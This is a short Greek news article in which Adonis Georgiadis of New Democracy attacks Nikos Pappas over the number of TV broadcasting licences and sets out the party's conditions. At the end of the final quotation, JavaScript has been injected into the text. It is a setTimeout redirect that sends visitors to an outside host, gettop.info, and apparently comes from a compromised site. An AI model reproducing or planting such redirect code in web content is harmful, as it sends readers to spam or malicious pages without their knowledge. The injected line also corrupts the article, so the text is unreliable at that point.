Γεωργιάδης: Ο Παππάς άδειασε τον Βούτση στον αριθμό των αδειών

0
5

 

Ο αντιπρόεδρος της Νέας Δημοκρατίας Άδωνις Γεωργιάδης απαντώντας στα λεγόμενα του Νίκου Παππά ο οποίος μίλησε σήμερα στον ΣΚΑΙ είπε ότι ακόμη και αν δείξουμε εμπιστοσύνη στον Βούτση δεν έχουμε εμπιστοσύνη στον κ Παππά. Το θέμα του αριθμού των αδειών είναι το κορυφαίο ζήτημα που έθεσε η ΝΔ και δεν πάμε πίσω από αυτό.

«Σήμερα ο κ Παππάς άδειασε τον κ Βούτση ο οποίος στη συνδιάσκεψη των προέδρων δεσμεύτηκε ότι θα πάρει πίσω τον αριθμό τέσσερα. Ο Παππάς είπε σήμερα ότι επιμένει στον αριθμό 4 γιατί είναι ο πυρήνας του νόμου του», είπε ο κ Γεωργιάδης.

«Αν καταργηθεί ο αριθμός τέσσερα, ώστε να μην δημιουργείται η αναστάτωση και αν επιστρέψουν οι αρμοδιότητες στο ΕΣΡ, αμέσως θα προτείνουμε τα πρόσωπα τα οποία θέλουμε», τόνισε.

«Αν όμως ισχύουν αυτά που είπε σήμερα μιλώντας στον ΣΚΑΙ, που είναι ευθέως αντίθετα με τα όσα είπε ο κ Βούτσης, τότε η ΝΔ δεν μπορεί να συναινέσει. Αυτή είναι η ακριβής μας θέση εξαρχής δεν θα παίξει ο κ Παππάς με τη νοημοσύνη μας, με τη δημοκρατία και τους εργαζομένους», πρόσθεσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here